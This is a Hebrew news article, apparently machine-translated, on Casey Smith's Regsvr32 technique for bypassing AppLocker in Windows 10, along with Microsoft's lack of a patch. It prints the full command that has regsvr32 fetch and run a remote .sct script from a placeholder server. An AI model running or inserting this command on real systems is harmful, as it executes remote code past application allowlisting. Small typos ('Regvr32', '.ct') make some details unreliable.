חוקר מקולורדו שהולך בשם, קייסי סמית ', גילה כי ניתן להשתמש ב- Regsvr32 כדי לעקוף את AppLocker ב- Windows 10, וזו בעיה גדולה עבור משתמשי מחשבים, ובמיוחד אלה בסביבה העסקית.

AppLocker הוצג לראשונה ב- Windows 7 ו- Windows Server 2008 R2. זה נועד לאפשר למנהלי מערכת לציין איזו קבוצה או משתמשים יכולים לנצל חלק מהיישומים או את כולם על סמך זהותם הייחודית של קבצים. אם אתה אדם שנוטה להשתמש ב- AppLocker, זה אמור להיות ידוע שאפשר להשתמש בו כדי ליצור כללים מסוימים כדי לאפשר ליישומים להפעיל או לעצור אותם במסלוליהם.

למי שאולי לא מודע, Regvr32 יכול לשמש לרישום וביטול רישום של קבצי DLL. זה לא כלי של לחיצה אחת, כיוון שהוא כלי שורת פקודה, כך שרק משתמשי מחשבים מתקדמים צריכים לנסות לנצל את מה שיש לו להציע.

אנו מבינים שבאמצעות טכניקה זו זה לא משנה את הרישום של מערכת המחשבים, דבר שמקשה על המנהלים לדעת אם בוצעו שינויים כלשהם.

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

"הדבר המדהים כאן הוא ש regsvr32 כבר מודע לפרוקסי, משתמש ב- TLS, עוקב אחר הפניות וכו '… ו … ניחשת נכון בינארי MS חתום וברירת מחדל. אז כל מה שאתה צריך לעשות זה לארח את קובץ ה-.ct שלך במיקום שאתה שולט בו, "כתב סמית '.

הטכניקה שלעיל אינה דורשת הרשאות ניהול והיא לא משנה את הרישום. יתר על כן, ניתן לקרוא לסקריפטים דרך HTTP או HTTPS. נכון לעכשיו, מיקרוסופט לא פרסמה תיקון לבעיה הקטנה הזו, כך שהאפשרות היחידה בשלב זה היא לחסום את Regsvr32 דרך חומת האש של Windows.

באופן מעניין, ענקית התוכנה טרם הגיבה על סוגיית האבטחה שעומדת בפני מערכת ההפעלה שלה. כעת, כשהיא בחוץ, אנו מצפים לשמוע משהו מהחברה יחד עם שיחות על תיקון עתידי.